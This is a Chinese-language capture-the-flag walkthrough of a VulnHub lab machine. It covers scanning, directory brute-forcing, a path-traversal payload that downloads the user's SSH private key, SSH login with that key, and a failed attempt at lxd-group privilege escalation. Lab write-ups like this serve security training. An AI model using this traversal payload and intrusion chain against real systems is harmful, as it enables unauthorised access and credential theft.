声明
好好学习,天天向上
搭建
官方建议virtual打开,我这里都调成桥接
渗透
存活扫描,发现目标
arp-scan -l
端口扫描
nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A
开启端口
发现开启80,6688
访问80
http://192.168.31.121
目录扫描
gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
访问一下这个/lavalamp
http://192.168.31.121/lavalamp
在最下面发现contact us可以用,提交数据看看
发现其像另一个php提交这些表单内容
访问,在向我们挑衅, 让我们绕过他
http://192.168.31.121/lavalamp/canyoubypassme.php
查看页面源代码发现一个table被设置成透明隐藏了
把这个值调成1.0,输入一个数字,然后下载这个数字,任意文件下载?猜测就是文件包含吧
抓包康康吧,访问passwd失败
但是在最前面随便加上一个内容就成功了
想办法搞定ford这个用户
在/home/ford/.ssh/找到了公钥、私钥,并将私钥保存到本地
file=/vulnhub/../../../../../../../home/ford/.ssh/id_rsa&read=Download+the+number
复制私钥到kali
调整权限并ssh登录
chmod 0600 ./id_rsa
ssh -p 6688 ford@192.168.31.121 -i id_rsa
拿到flag
使用id命令显示用户的UID以及所属组的GID,可以看到当前用户ford所属组中还有一个特殊的lxd组,这个是提权的关键点
当然也有sh脚本可以扫描
在kali上生成镜像
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
完成上面操作之后会在当前目录下生成一个tar.gz镜像文件
然并卵,以失败告终,各种报错导致没办法生成tar.gz,后面再研究研究把,耻辱了